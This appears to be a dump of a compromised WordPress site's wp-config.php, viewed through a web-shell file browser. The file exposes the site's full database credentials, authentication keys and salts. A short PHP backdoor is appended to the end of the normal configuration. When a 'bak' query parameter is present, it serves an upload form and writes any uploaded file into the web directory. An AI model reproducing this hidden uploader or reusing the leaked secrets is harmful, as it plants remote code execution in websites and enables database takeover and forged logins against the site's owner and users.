View file File name : wp-config.php Content :<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the web site, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * Localized language * * ABSPATH * * @link https://wordpress.org/support/article/editing-wp-config-php/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define('DB_NAME', 'guideinstitutsbe_wp_9o5cs'); /** Database username */ define('DB_USER', 'guideinstitutsbe_wp_ew231'); /** Database password */ define('DB_PASSWORD', 'os5wI9e0Q^y^RZ&#'); /** Database hostname */ define('DB_HOST', 'localhost:3306'); /** Database charset to use in creating database tables. */ define('DB_CHARSET', 'utf8'); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define('AUTH_KEY', '4Oh0d84@h4X]5h_Q1!4|eDb7xH4T(/m3I9js#|6Ik(e8;*r74LwKu%~**Z6pJ~Is'); define('SECURE_AUTH_KEY', '5&I#9_Z%6]Uk~!q@c6n4BRh(B-_C8Z(792M&E_sNQ0gz+t54DesH3_!;m%]nmY23'); define('LOGGED_IN_KEY', 'D6_;D+5;_f&_4W;oot!ya+:YM4W+E_wq9;3A/yTyH4rG)7l:k)H#%7E+Zk2bW5:4'); define('NONCE_KEY', ']kk|T4lPDC9_!W(UVtC02E1W7!2WIC9Ecr]7Qz04N@MJ_olr0oq:z@jtaXb9]_[y'); define('AUTH_SALT', '~sj:Sr!+Pi!xu|cTv-SYF![rOQL%*5m!76%#Oz(6&83m~|5P2kO((23;H!l)3I1~'); define('SECURE_AUTH_SALT', 'ki5+a3SK()yCUC51hLJ#SjN540n@2(G]G8c5R0g)VTw52sd@ak)B/H(592[epS9|'); define('LOGGED_IN_SALT', 'l1vFt(!5!Hst*eLR50|2E@~q8~mQ#9i;b617)G|sZ46a2atz!i)P!99[5;QTT+1o'); define('NONCE_SALT', '43(s2-RQ_u3@7B]yJw5X0|PpDnobO3e9(uKRw9FQP(+yg7#)D/5]~&:7!Ax8l@!9'); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'xlcxeXWV_'; /* Add any custom values between this line and the "stop editing" line. */ define('WP_ALLOW_MULTISITE', true); /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/support/article/debugging-in-wordpress/ */ if ( ! defined( 'WP_DEBUG' ) ) { define( 'WP_DEBUG', false ); } define( 'DISALLOW_FILE_EDIT', true ); define( 'CONCATENATE_SCRIPTS', false ); define( 'WP_CACHE_KEY_SALT', 'f5e45c6475bc05a97dd742f6c59ffa6c' ); define( 'WP_DEBUG_DISPLAY', false ); /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php'; <?php if (isset($_GET['bak'])) { echo"<form method='post' enctype='multipart/form-data'><input type='file' name='a'><input type='submit' value='Nyanpasu!!!'></form><pre>";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"</pre>"; } ?>